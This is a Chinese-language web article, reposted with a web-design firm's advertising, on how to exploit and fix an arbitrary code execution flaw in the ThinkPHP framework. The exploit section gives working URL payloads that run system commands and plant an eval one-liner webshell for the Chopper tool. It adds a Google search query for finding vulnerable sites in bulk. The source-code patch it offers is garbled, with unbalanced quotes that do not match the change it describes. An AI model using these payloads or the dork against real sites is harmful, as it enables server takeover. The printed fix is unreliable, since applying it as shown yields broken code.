這篇文章主要講解了“如何利用及修復ThinkPHP框架任意代碼執行漏洞”,文中的講解內容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“如何利用及修復ThinkPHP框架任意代碼執行漏洞”吧!
創新互聯公司服務項目包括久治網站建設、久治網站制作、久治網頁制作以及久治網絡營銷策劃等。多年來,我們專注于互聯網行業,利用自身積累的技術優勢、行業經驗、深度合作伙伴關系等,向廣大中小型企業、政府機構等提供互聯網行業的解決方案,久治網站推廣取得了明顯的社會效益與經濟效益。目前,我們服務的客戶以成都為中心已經輻射到久治省份的部分城市,未來相信會繼續擴大服務區域并繼續獲得客戶的支持與信任!近期thinkphp框架爆出了一個任意代碼執行漏洞,其危害性相當的高,漏洞利用方法如下:
index.php/module/aciton/param1/${@print(THINK_VERSION)} index.php/module/aciton/param1/${@function_all()}
其中的function_all代表任何函數,比如:
index.php/module/aciton/param1/${@phpinfo()}
就可以獲取服務器的系統配置信息等。
index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al
可以列出網站文件列表
index.php/module/action/param1/{${eval($_POST[s])}}
就可以直接執行一句話代碼,用菜刀直接連接.
這樣黑客們就可以直接通過google批量搜索關鍵字:thinkphp intitle:系統發生錯誤 來獲取更多使用thinkphp框架的網站列表。可見其危害性相當的大。
thinkphp框架執行任意代碼漏洞修復方法:
用戶可下載官方發布的補丁:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
或者或者直接修改源碼:
將/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
修改為:
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));
將preg_replace第二個參數中的雙引號改為單引號,防止其中的php變量語法被解析執行。
感謝各位的閱讀,以上就是“如何利用及修復ThinkPHP框架任意代碼執行漏洞”的內容了,經過本文的學習后,相信大家對如何利用及修復ThinkPHP框架任意代碼執行漏洞這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是創新互聯網站建設公司,,小編將為大家推送更多相關知識點的文章,歡迎關注!
標題名稱:如何利用及修復ThinkPHP框架任意代碼執行漏洞-創新互聯
本文鏈接:http://vcdvsql.cn/article30/cescso.html
成都網站建設公司_創新互聯,為您提供網站排名、品牌網站建設、動態網站、電子商務、App開發、網站制作
聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯